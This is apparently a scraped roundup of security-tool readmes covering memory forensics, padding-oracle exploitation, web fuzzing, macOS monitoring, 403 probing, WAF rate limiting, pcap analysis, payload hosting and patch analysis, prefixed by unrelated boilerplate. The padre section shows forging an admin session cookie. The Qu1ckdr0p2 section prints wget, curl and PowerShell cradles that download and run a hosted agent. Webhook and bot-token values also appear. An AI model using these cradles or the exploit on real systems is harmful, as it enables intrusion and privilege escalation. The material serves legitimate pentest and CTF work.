Section 52 - Investigating Malicious Ladder Logic | Microsoft Defender for IoT Webinar - YouTube

Contributing

This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com.

When you submit a pull request, a CLA bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.

This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments.

Trademarks

This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow Microsoft's Trademark & Brand Guidelines. Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos are subject to those third-party's policies.



MemTracer - Memory Scaner

By: Zion3R


MemTracer is a tool that offers live memory analysis capabilities, allowing digital forensic practitioners to discover and investigate stealthy attack traces hidden in memory. The MemTracer is implemented in Python language, aiming to detect reflectively loaded native .NET framework Dynamic-Link Library (DLL). This is achieved by looking for the following abnormal memory region’s characteristics:

  • The state of memory pages flags in each memory region. Specifically, the MEM_COMMIT flag which is used to reserve memory pages for virtual memory use.
  • The type of pages in the region. The MEM_MAPPED page type indicates that the memory pages within the region are mapped into the view of a section.
  • The memory protection for the region. The PAGE_READWRITE protection to indicate that the memory region is readable and writable, which happens if Assembly.Load(byte[]) method is used to load a module into memory.
  • The memory region contains a PE header.

The tool starts by scanning the running processes, and by analyzing the allocated memory regions characteristics to detect reflective DLL loading symptoms. Suspicious memory regions which are identified as DLL modules are dumped for further analysis and investigation.
Furthermore, the tool features the following options:

  • Dump the compromised process.
  • Export a JSON file that provides information about the compromised process, such as the process name, ID, path, size, and base address.
  • Search for specific loaded module by name.

Example

python.exe memScanner.py [-h] [-r] [-m MODULE]
-h, --help show this help message and exit
-r, --reflectiveScan Looking for reflective DLL loading
-m MODULE, --module MODULE Looking for spcefic loaded DLL

The script needs administrator privileges in order incepect all processes.



Padre - Blazing Fast, Advanced Padding Oracle Exploit

By: Zion3R


padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption

Features:

  • blazing fast, concurrent implementation
  • decryption of tokens
  • encryption of arbitrary data
  • automatic fingerprinting of padding oracles
  • automatic detection of cipher block length
  • HINTS! if failure occurs during operations, padre will hint you about what can be tweaked to succeed
  • supports tokens in GET/POST parameters, Cookies
  • flexible specification of encoding rules (base64, hex, etc.)

Demo

Installation/Update

  • Fastest way is to download pre-compiled binary for your OS from Latest release

  • Alternatively, if you have Go installed, build from source:

go install github.com/glebarez/padre@latest

Usage scenario

If you find a suspected padding oracle, where the encrypted data is stored inside a cookie named SESS, you can use the following:

padre -u 'https://target.site/profile.php' -cookie 'SESS=$' 'Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg=='

padre will automatically fingerprint HTTP responses to determine if padding oracle can be confirmed. If server is indeed vulnerable, the provided token will be decrypted into something like:

 {"user_id": 456, "is_admin": false}

It looks like you could elevate your privileges here!

You can attempt to do so by first generating your own encrypted data that the oracle will decrypt back to some sneaky plaintext:

padre -u 'https://target.site/profile.php' -cookie 'SESS=$' -enc '{"user_id": 456, "is_admin": true}'

This will spit out another encoded set of encrypted data, perhaps something like below (if base64 used):

dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

Now you can open your browser and set the value of the SESS cookie to the above value. Loading the original oracle page, you should now see you are elevated to admin level.

Impact of padding Oracles

  • disclosing encrypted session information
  • bypassing authentication
  • providing fake tokens that server will trust
  • generally, broad extension of attack surface

Full usage options

Usage: padre [OPTIONS] [INPUT]

INPUT:
In decrypt mode: encrypted data
In encrypt mode: the plaintext to be encrypted
If not passed, will read from STDIN

NOTE: binary data is always encoded in HTTP. Tweak encoding rules if needed (see options: -e, -r)

OPTIONS:

-u *required*
target URL, use $ character to define token placeholder (if present in URL)

-enc
Encrypt mode

-err
Regex pattern, HTTP response bodies will be matched against this to detect padding oracle. Omit to perform automatic fingerprinting

-e
Encoding to apply to binary data. Supported values:
b64 (standard base64) *default*
lhex (lowercase hex)

-r
Additional replacements to apply after encoding binary data. Use odd-length strings, consiting of pairs of characters <OLD><NEW>.
Example:
If server uses base64, but replaces '/' with '!', '+' with '-', '=' with '~', then use -r "/!+-=~"

-cookie
Cookie value to be set in HTTP requests. Use $ character to mark token placeholder.

-post
String data to perform POST requests. Use $ character to mark token placeholder.

-ct
Content-Type for POST requests. If not specified, Content-Type will be determined automatically.

-b
Block length used in cipher (use 16 for AES). Omit to perform automatic detection. Supported values:
8
16 *default*
32

-p
Number of parallel HTTP connections established to target server [1-256]
30 *default*

-proxy
HTTP proxy. e.g. use -proxy "http://localhost:8080" for Burp or ZAP

Further read

Alternative tools



Afuzz - Automated Web Path Fuzzing Tool For The Bug Bounty Projects

By: Zion3R

Afuzz is an automated web path fuzzing tool for the Bug Bounty projects.

Afuzz is being actively developed by @rapiddns


Features

  • Afuzz automatically detects the development language used by the website, and generates extensions according to the language
  • Uses blacklist to filter invalid pages
  • Uses whitelist to find content that bug bounty hunters are interested in in the page
  • filters random content in the page
  • judges 404 error pages in multiple ways
  • perform statistical analysis on the results after scanning to obtain the final result.
  • support HTTP2

Installation

git clone https://github.com/rapiddns/Afuzz.git
cd Afuzz
python setup.py install

OR

pip install afuzz

Run

afuzz -u http://testphp.vulnweb.com -t 30

Result

Table

+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://testphp.vulnweb.com/ |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
| target | path | status | redirect | title | length | content-type | lines | words | type | mark |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+ -----------+----------+
| http://testphp.vulnweb.com/ | .idea/workspace.xml | 200 | | | 12437 | text/xml | 217 | 774 | check | |
| http://testphp.vulnweb.com/ | admin | 301 | http://testphp.vulnweb.com/admin/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
| http://testphp.vulnweb.com/ | login.php | 200 | | login page | 5009 | text/html | 120 | 432 | check | |
| http://testphp.vulnweb.com/ | .idea/.name | 200 | | | 6 | application/octet-stream | 1 | 1 | check | |
| http://testphp.vulnweb.com/ | .idea/vcs.xml | 200 | | | 173 | text/xml | 8 | 13 | check | |
| http://testphp.vulnweb.com/ | .idea/ | 200 | | Index of /.idea/ | 937 | text/html | 14 | 46 | whitelist | index of |
| http://testphp.vulnweb.com/ | cgi-bin/ | 403 | | 403 Forbidden | 276 | text/html | 10 | 28 | folder | 403 |
| http://testphp.vulnweb.com/ | .idea/encodings.xml | 200 | | | 171 | text/xml | 6 | 11 | check | |
| http://testphp.vulnweb.com/ | search.php | 200 | | search | 4218 | text/html | 104 | 364 | check | |
| http://testphp.vulnweb.com/ | produc t.php | 200 | | picture details | 4576 | text/html | 111 | 377 | check | |
| http://testphp.vulnweb.com/ | admin/ | 200 | | Index of /admin/ | 248 | text/html | 8 | 16 | whitelist | index of |
| http://testphp.vulnweb.com/ | .idea | 301 | http://testphp.vulnweb.com/.idea/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+```

Json

{
"result": [
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/workspace.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 12437,
"content_type": "text/xml",
"lines": 217,
"words": 774,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/workspace.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin",
"status": 301,
"redirect": "http://testphp.vulnweb.com/admin/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words ": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "login.php",
"status": 200,
"redirect": "",
"title": "login page",
"length": 5009,
"content_type": "text/html",
"lines": 120,
"words": 432,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/login.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/.name",
"status": 200,
"redirect": "",
"title": "",
"length": 6,
"content_type": "application/octet-stream",
"lines": 1,
"words": 1,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/.name"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/vcs.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 173,
"content_type": "text/xml",
"lines": 8,
"words": 13,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/vcs.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/",
"status": 200,
"redirect": "",
"title": "Index of /.idea/",
"length": 937,
"content_type": "text/html",
"lines": 14,
"words": 46,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "cgi-bin/",
"status": 403,
"redirect": "",
"title": "403 Forbidden",
"length": 276,
"content_type": "text/html",
"lines": 10,
"words": 28,
"type": "folder",
"mark": "403",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/cgi-bin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/encodings.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 171,
"content_type": "text/xml",
"lines": 6,
"words": 11,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/encodings.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "search.php",
"status": 200,
"redirect": "",
"title": "search",
"length": 4218,
"content_type": "text/html",
"lines": 104,
"words": 364,
"t ype": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/search.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "product.php",
"status": 200,
"redirect": "",
"title": "picture details",
"length": 4576,
"content_type": "text/html",
"lines": 111,
"words": 377,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/product.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin/",
"status": 200,
"redirect": "",
"title": "Index of /admin/",
"length": 248,
"content_type": "text/html",
"lines": 8,
"words": 16,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea",
"status": 301,
"redirect": "http://testphp.vulnweb.com/.idea/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea"
}
],
"total": 12,
"targe t": "http://testphp.vulnweb.com/"
}

Wordlists (IMPORTANT)

Summary:

  • Wordlist is a text file, each line is a path.
  • About extensions, Afuzz replaces the %EXT% keyword with extensions from -e flag.If no flag -e, the default is used.
  • Generate a dictionary based on domain names. Afuzz replaces %subdomain% with host, %rootdomain% with root domain, %sub% with subdomain, and %domain% with domain. And generated according to %ext%

Examples:

  • Normal extensions
index.%EXT%

Passing asp and aspx extensions will generate the following dictionary:

index
index.asp
index.aspx
  • host
%subdomain%.%ext%
%sub%.bak
%domain%.zip
%rootdomain%.zip

Passing https://test-www.hackerone.com and php extension will genrate the following dictionary:

test-www.hackerone.com.php
test-www.zip
test.zip
www.zip
testwww.zip
hackerone.zip
hackerone.com.zip

Options

    #     ###### ### ###  ######  ######
# # # # # # # # #
# # # # # # # # # #
# # ### # # # #
# # # # # # # #
##### # # # # # # #
# # # # # # # # #
### ### ### ### ###### ######



usage: afuzz [options]

An Automated Web Path Fuzzing Tool.
By RapidDNS (https://rapiddns.io)

options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-o OUTPUT, --output OUTPUT
Output file
-e EXTENSIONS, --extensions EXTENSIONS
Extension list separated by commas (Example: php,aspx,jsp)
-t THREAD, --thread THREAD
Number of threads
-d DEPTH, --depth DEPTH
Maximum recursion depth
-w WORDLIST, --wordlist WORDLIST
wordlist
-f, --fullpath fullpath
-p PROXY, --proxy PROXY
proxy, (ex:http://127.0.0.1:8080)

How to use

Some examples for how to use Afuzz - those are the most common arguments. If you need all, just use the -h argument.

Simple usage

afuzz -u https://target
afuzz -e php,html,js,json -u https://target
afuzz -e php,html,js -u https://target -d 3

Threads

The thread number (-t | --threads) reflects the number of separated brute force processes. And so the bigger the thread number is, the faster afuzz runs. By default, the number of threads is 10, but you can increase it if you want to speed up the progress.

In spite of that, the speed still depends a lot on the response time of the server. And as a warning, we advise you to keep the threads number not too big because it can cause DoS.

afuzz -e aspx,jsp,php,htm,js,bak,zip,txt,xml -u https://target -t 50

Blacklist

The blacklist.txt and bad_string.txt files in the /db directory are blacklists, which can filter some pages

The blacklist.txt file is the same as dirsearch.

The bad_stirng.txt file is a text file, one per line. The format is position==content. With == as the separator, position has the following options: header, body, regex, title

Language detection

The language.txt is the detection language rule, the format is consistent with bad_string.txt. Development language detection for website usage.

References

Thanks to open source projects for inspiration

  • Dirsearch by by Shubham Sharma
  • wfuzz by Xavi Mendez
  • arjun by Somdev Sangwan


Red Canary Mac Monitor - An Advanced, Stand-Alone System Monitoring Tool Tailor-Made For macOS Security Research

By: Zion3R

Red Canary Mac Monitor is an advanced, stand-alone system monitoring tool tailor-made for macOS security research, malware triage, and system troubleshooting. Harnessing Apple Endpoint Security (ES), it collects and enriches system events, displaying them graphically, with an expansive feature set designed to surface only the events that are relevant to you. The telemetry collected includes process, interprocess, and file events in addition to rich metadata, allowing users to contextualize events and tell a story with ease. With an intuitive interface and a rich set of analysis features, Red Canary Mac Monitor was designed for a wide range of skill levels and backgrounds to detect macOS threats that would otherwise go unnoticed. As part of Red Canary’s commitment to the research community, the Mac Monitor distribution package is available to download for free.

Requirements

  • Processor: We recommend an Apple Silicon machine, but Intel works too!
  • System memory: 4GB+ is recommended
  • macOS version: 13.1+ (Ventura)

How can I install this thing?

Homebrew? brew install --cask red-canary-mac-monitor

  • Go to the releases section and download the latest installer: https://github.com/redcanaryco/mac-monitor/releases
  • Open the app: Red Canary Mac Monitor.app
  • You'll be prompted to "Open System Settings" to "Allow" the System Extension.
  • Next, System Settings will automatically open to Full Disk Access -- you'll need to flip the switch to enable this for the Red Canary Security Extension. Full Disk Access is a requirement of Endpoint Security.
  • ️ Click the "Start" button in the app and you'll be prompted to reopen the app. Done!


Install footprint

  • Event monitor app which establishes an XPC connection to the Security Extension: /Applications/Red Canary Mac Monitor.app w/signing identifier of com.redcanary.agent.
  • Security Extension: /Library/SystemExtensions/../com.redcanary.agent.securityextension.systemextension w/signing identifier of com.redcanary.agent.securityextension.systemextension.

Uninstall

Homebrew? brew uninstall red-canary-mac-monitor. When using this option you will likely be prompted to authenticate to remove the System Extension.

  • From the Finder delete the app and authenticate to remove the System Extension. You can't do this from the Dock. It's that easy!
  • You can also just remove the Security Extension if you want in the app's menu bar or by going into the app settings.
  • (1.0.3) Supports removal using the ../Contents/SharedSupport/uninstall.sh script.

How are updates handled?

Homebrew? brew update && brew upgrade red-canary-mac-monitor. When using this option you will likely be prompted to authenticate to remove the System Extension.

  • When a new version is available for you to download we'll make a new release.
  • We'll include updated notes and telemetry summaries (if applicable) for each release.
  • All you, as the end user, will need to do is download the update and run the installer. We'll take care of the rest .

How to use this repository

Here we'll be hosting:

  • The distribution package for easy install. See the Releases section. Each major build corresponds to a code name. The first of these builds is GoldCardinal.
  • Telemetry reports in Telemetry reports/ (i.e. all the artifacts that can be collected by the Security Extension).
  • Iconography (what the symbols and colors mean) in Iconography/
  • Updated mute set summaries in Mute sets/
  • AtomicESClient is a seperate, but very closely related project showing the ropes of Endpoint Security check it out in: AtomicESClient/

Additionally, you can submit feature requests and bug reports here as well. When creating a new Issue you'll be able to use one of the two provided templates. Both of these options are also accessible from the in-app "Help" menu.

How are releases structured?

Each release of Red Canary Mac Monitor has a corresponding build name and version number. The first release has the build name of: GoldCardinal and version number 1.0.1.

What are some standout features?

  • High fidelity ES events modeled and enriched with some events containing further enrichment. For example, a process being File Quarantine-aware, a file being quarantined, code signing certificates, etc.

  • Dynamic runtime ES event subscriptions. You have the ability to on-the-fly modify your event subscriptions -- enabling you to cut down on noise while you're working through traces.

  • Path muting at the API level -- Apple's Endpoint Security team has put a lot of work recently into enabling advanced path muting / inversion capabilities. Here, we cover the majority of the API features: es_mute_path and es_mute_path_events along with the types of ES_MUTE_PATH_TYPE_PREFIX, ES_MUTE_PATH_TYPE_LITERAL, ES_MUTE_PATH_TYPE_TARGET_PREFIX, and ES_MUTE_PATH_TYPE_TARGET_LITERAL. Right now we do not support inversion. I'd love it if the ES team added inversion on a per-event basis instead of per-client.

  • Detailed event facts. Right click on any event in a table row to access event metadata, filtering, muting, and unsubscribe options. Core to the user experience is the ability to drill down into any given event or set of events. To enable this functionality we’ve developed “Event facts” windows which contain metadata / additional enrichment about any given event. Each event has a curated set metadata that is displayed. For example, process execution events will generally contain code signing information, environment variables, correlated events, etc. Below you see examples of file creation and BTM launch item added event facts.

  • Event correlation is an exceptionally important component in any analyst's tool belt. The ability to see which events are "related" to one-another enables you to manipulate the telemetry in a way that makes sense (other than simply dumping to JSON or representing an individual event). We perform event correlation at the process level -- this means that for any given event (which have an initiating and/or target process) we can deeply link events that any given process instigated.

  • Process grouping is another helpful way to represent process telemetry around a given ES_EVENT_TYPE_NOTIFY_EXEC or ES_EVENT_TYPE_NOTIFY_FORK event. By grouping processes in this way you can easily identify the chain of activity.

  • Artifact filtering enabled users to remove (but not destroy) events from view based on: event type, initiating process path, or target process path. This standout feature enables analysts to cut through the noise quickly while still retaining all data.

    • Lossy filtering (i.e. events that are dropped from the trace) is also available in the form of "dropping platform binaries" -- another useful technique to cut through the noise.





  • Telemetry export. Right now we support pretty JSON and JSONL (one JSON object per-line) for the full or partial system trace (keyboard shortcuts too). You can access these options in the menu bar under "Export Telemetry".
  • Process subtree generation. When viewing the event facts window for any given event we’ll attempt to generate a process lineage subtree in the left hand sidebar. This tree is intractable – click on any process and you’ll be taken to its event facts. Similarly, you can right click on any process in the tree to pop out the facts for that event.
  • Dynamic event distribution chart. This is a fun one enabled by the SwiftUI team. The graph shows the distribution of events you're subscribed to, currently in-scope (i.e. not filtered), and have a count of more than nothing. This enables you to very quickly identify noisy events. The chart auto-shows/hides itself, but you can bring it back with the: "Mini-chart" button in the toolbar.


Some other features

  • Another very important feature of any dynamic analysis tool is to not let an event limiter or memory inefficient implementation get in the way of the user experience. To address this (the best we currently can) we’ve implemented an asynchronous parent / child-like Core Data stack which stores our events as “entities” in-memory. This enables us to store virtually unlimited events with Mac Monitor. Although, the time of insertions does become more taxing as the event limit gets very large.
  • Since Mac Monitor is based on a Security Extension which is always running in the background (like an EDR sensor) we baked in functionality such that it does not process events when a system trace is not occurring. This means that the Red Canary Security Extension (com.redcanary.agent.securityextension) will not needlessly utilize resources / battery power when a trace is not occurring.
  • Distribution package: The install process is often overlooked. However, if users do not have a good understanding of what’s being installed or if it’s too complex to install the barrier to entry might be just high enough to dissuade people from using it. This is why we ship Mac Monitor as a notarized distribution package.

Can you open source Mac Monitor?

We know how much you would love to learn from the source code and/or build tools or commercial products on top of this. Currently, however, Mac Monitor will be distributed as a free, closed-source tool. Enjoy what's being offered and please continue to provide your great feedback. Additionally, never hesitate to reach out if there's one aspect of the implementation you'd love to learn more about. We're an open book when it comes to geeking out about all things implementation, usage, and research methodology.



WebSecProbe - Web Security Assessment Tool, Bypass 403

By: Zion3R


A cutting-edge utility designed exclusively for web security aficionados, penetration testers, and system administrators. WebSecProbe is your advanced toolkit for conducting intricate web security assessments with precision and depth. This robust tool streamlines the intricate process of scrutinizing web servers and applications, allowing you to delve into the technical nuances of web security and fortify your digital assets effectively.


WebSecProbe is designed to perform a series of HTTP requests to a target URL with various payloads in order to test for potential security vulnerabilities or misconfigurations. Here's a brief overview of what the code does:

  • It takes user input for the target URL and the path.
  • It defines a list of payloads that represent different HTTP request variations, such as URL-encoded characters, special headers, and different HTTP methods.
  • It iterates through each payload and constructs a full URL by appending the payload to the target URL.
  • For each constructed URL, it sends an HTTP GET request using the requests library, and it captures the response status code and content length.
  • It prints the constructed URL, status code, and content length for each request, effectively showing the results of each variation's response from the target server.
  • After testing all payloads, it queries the Wayback Machine (a web archive) to check if there are any archived snapshots of the target URL/path. If available, it prints the closest archived snapshot's information.

Does This Tool Bypass 403 ?

It doesn't directly attempt to bypass a 403 Forbidden status code. The code's purpose is more about testing the behavior of the server when different requests are made, including requests with various payloads, headers, and URL variations. While some of the payloads and headers in the code might be used in certain scenarios to test for potential security misconfigurations or weaknesses, it doesn't guarantee that it will bypass a 403 Forbidden status code.

In summary, this code is a tool for exploring and analyzing a web server's responses to different requests, but whether or not it can bypass a 403 Forbidden status code depends on the specific configuration and security measures implemented by the target server.

 

pip install WebSecProbe

WebSecProbe <URL> <Path>

Example:

WebSecProbe https://example.com admin-login

from WebSecProbe.main import WebSecProbe

if __name__ == "__main__":
url = 'https://example.com' # Replace with your target URL
path = 'admin-login' # Replace with your desired path

probe = WebSecProbe(url, path)
probe.run()



Aws-Waf-Header-Analyzer - The Purpose Of The Project Is To Create Rate Limit In AWS WaF Based On HTTP Headers

By: Zion3R


The purpose of the project is to create rate limit in AWS WaF based on HTTP headers.


Golang is a dependencie to build the binary. See the documentation to install: https://go.dev/doc/install

make
sudo make install

The rules configuration is very simple, for example, the threshold is the limited of the requests in X time. It's possible to monitoring multiples headers, but, the header needs to be in HTTP Request header log.

rules:
header:
x-api-id: # The header name in HTTP Request header
threshold: 100

token:
threshold: 1000

It's possible send notifications to Slack and Telegram. To configure slack notifications, you needs create a webhook configuration, see the slack documentation: https://api.slack.com/messaging/webhooks

Telegram bot father: https://t.me/botfather

notifications:
slack:
webhook-url: https://hooks.slack.com/services/DA2DA13QS/LW5DALDSMFDT5/qazqqd4f5Qph7LgXdZaHesXs

telegram:
bot-token: "123456789:NNDa2tbpq97izQx_invU6cox6uarhrlZDfa"
chat-id: "-4128833322"

To set up AWS credentials, it's advisable to export them as environment variables. Here's a recommended approach:

export AWS_ACCESS_KEY_ID=".."
export AWS_SECRET_ACCESS_KEY=".."
export AWS_REGION="us-east-1"

retrive-logs-minutes-ago is the time range you want to fetch the logs, in this example, logs from 1 hour ago.

aws:
waf-log-group-name: aws-waf-logs-cloudwatch-cloudfront
region: us-east-1
retrive-logs-minutes-ago: 60


TrafficWatch - TrafficWatch, A Packet Sniffer Tool, Allows You To Monitor And Analyze Network Traffic From PCAP Files

By: Zion3R


TrafficWatch, a packet sniffer tool, allows you to monitor and analyze network traffic from PCAP files. It provides insights into various network protocols and can help with network troubleshooting, security analysis, and more.

  • Protocol-specific packet analysis for ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, and NetBIOS.
  • Packet filtering based on protocol, source IP, destination IP, source port, destination port, and more.
  • Summary statistics on captured packets.
  • Interactive mode for in-depth packet inspection.
  • Timestamps for each captured packet.
  • User-friendly colored output for improved readability.
  • Python 3.x
  • scapy
  • argparse
  • pyshark
  • colorama

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/TrafficWatch.git
  2. Navigate to the project directory:

    cd TrafficWatch
  3. Install the required dependencies:

    pip install -r requirements.txt

python3 trafficwatch.py --help
usage: trafficwatch.py [-h] -f FILE [-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}] [-c COUNT]

Packet Sniffer Tool

options:
-h, --help show this help message and exit
-f FILE, --file FILE Path to the .pcap file to analyze
-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}, --protocol {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}
Filter by specific protocol
-c COUNT, --count COUNT
Number of packets to display

To analyze packets from a PCAP file, use the following command:

python trafficwatch.py -f path/to/your.pcap

To specify a protocol filter (e.g., HTTP) and limit the number of displayed packets (e.g., 10), use:

python trafficwatch.py -f path/to/your.pcap -p HTTP -c 10

  • -f or --file: Path to the PCAP file for analysis.
  • -p or --protocol: Filter packets by protocol (ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, NetBIOS).
  • -c or --count: Limit the number of displayed packets.

Contributions are welcome! If you want to contribute to TrafficWatch, please follow our contribution guidelines.

If you have any questions, comments, or suggestions about Dosinator, please feel free to contact me:

This project is licensed under the MIT License.

Thank you for considering supporting me! Your support enables me to dedicate more time and effort to creating useful tools like DNSWatch and developing new projects. By contributing, you're not only helping me improve existing tools but also inspiring new ideas and innovations. Your support plays a vital role in the growth of this project and future endeavors. Together, let's continue building and learning. Thank you!" 



Qu1Ckdr0P2 - Quicky Serve Files Over Http Or Https Using Flask

By: Zion3R


Rapidly host payloads and post-exploitation bins over HTTP or HTTPS.

Designed to be used on exams like OSCP / PNPT or CTFs HTB / etc.

Pull requests and issues welcome. As are any contributions.

Qu1ckdr0p2 comes with an alias and search feature. The tools are located in the qu1ckdr0p2-tools repository. By default it will generate a self-signed certificate to use when using the --https option, priority is also given to the tun0 interface when the webserver is running, otherwise it will use eth0.

The common.ini defines the mapped aliases used within the --search and -u options.


When the webserver is running there are several download cradles printed to the screen to copy and paste.

pip3 install qu1ckdr0p2

echo "alias serv='~/.local/bin/serv'" >> ~/.zshrc
source ~/.zshrc

or

echo "alias serv='~/.local/bin/serv'" >> ~/.bashrc
source ~/.bashrc

serv init --update

$ serv serve -f implant.bin --https 443
$ serv serve -f file.example --http 8080

$ serv --help            
Usage: serv [OPTIONS] COMMAND [ARGS]...

Welcome to qu1ckdr0p2 entry point.

Options:
--debug Enable debug mode.
--help Show this message and exit.

Commands:
init Perform updates.
serve Serve files.
dynamic number -f, --file FILE Serve a file --http INTEGER Use HTTP with a custom port --https INTEGER Use HTTPS with a custom port -h, --help Show this message and exit." dir="auto">
$ serv serve --help
Usage: serv serve [OPTIONS]

Serve files.

Options:
-l, --list List aliases
-s, --search TEXT Search query for aliases
-u, --use INTEGER Use an alias by a dynamic number
-f, --file FILE Serve a file
--http INTEGER Use HTTP with a custom port
--https INTEGER Use HTTPS with a custom port
-h, --help Show this message and exit.
$ serv init --help       
Usage: serv init [OPTIONS]

Perform updates.

Options:
--update Check and download missing tools.
--update-self Update the tool using pip.
--update-self-test Used for dev testing, installs unstable build.
--help Show this message and exit.
$ serv init --update
$ serv init --update-self

The mapped alias numbers for the -u option are dynamic so you don't have to remember specific numbers or ever type out a tool name.

ligolo [→] Path: ~/.qu1ckdr0p2/windows/agent.exe [→] Alias: ligolo_agent_win [→] Use: 1 [→] Path: ~/.qu1ckdr0p2/windows/proxy.exe [→] Alias: ligolo_proxy_win [→] Use: 2 [→] Path: ~/.qu1ckdr0p2/linux/agent [→] Alias: ligolo_agent_linux [→] Use: 3 [→] Path: ~/.qu1ckdr0p2/linux/proxy [→] Alias: ligolo_proxy_linux [→] Use: 4 (...)" dir="auto">
$ serv serve --search ligolo               

[→] Path: ~/.qu1ckdr0p2/windows/agent.exe
[→] Alias: ligolo_agent_win
[→] Use: 1

[→] Path: ~/.qu1ckdr0p2/windows/proxy.exe
[→] Alias: ligolo_proxy_win
[→] Use: 2

[→] Path: ~/.qu1ckdr0p2/linux/agent
[→] Alias: ligolo_agent_linux
[→] Use: 3

[→] Path: ~/.qu1ckdr0p2/linux/proxy
[→] Alias: ligolo_proxy_linux
[→] Use: 4
(...)
$ serv serve --search ligolo -u 3 --http 80

[→] Serving: ../../.qu1ckdr0p2/linux/agent
[→] Protocol: http
[→] IP address: 192.168.1.5
[→] Port: 80
[→] Interface: eth0
[→] CTRL+C to quit

[→] URL: http://192.168.1.5:80/agent

[↓] csharp:
$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile('http://192.168.1.5:80/agent', 'c:\windows\temp\agent'); Start-Process 'c:\windows\temp\agent'

[↓] wget:
wget http://192.168.1.5:80/agent -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent

[↓] curl:
curl http://192.168.1.5:80/agent -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent

[↓] powershell:
Invoke-WebRequest -Uri http://192.168.1.5:80/agent -OutFile c:\windows\temp\agent; Start-Process c:\windows\temp\agent

⠧ Web server running

MIT



PatchaPalooza - A Comprehensive Tool That Provides An Insightful Analysis Of Microsoft's Monthly Security Updates

By: Zion3R


A comprehensive tool that provides an insightful analysis of Microsoft's monthly security updates.

IF you are interested in seing all this data in a live website, visit:


PatchaPalooza uses the power of Microsoft's MSRC CVRF API to fetch, store, and analyze security update data. Designed for cybersecurity professionals, it offers a streamlined experience for those who require a quick yet detailed overview of vulnerabilities, their exploitation status, and more. This tool operates entirely offline once the data has been fetched, ensuring that your analyses can continue even without an internet connection.

  • Retrieve Data: Fetches the latest security update summaries directly from Microsoft.
  • Offline Storage: Stores the fetched data for offline analysis.
  • Detailed Analysis: Analyze specific months or get a comprehensive view across months.
  • CVE Details: Dive deep into specifics of a particular CVE.
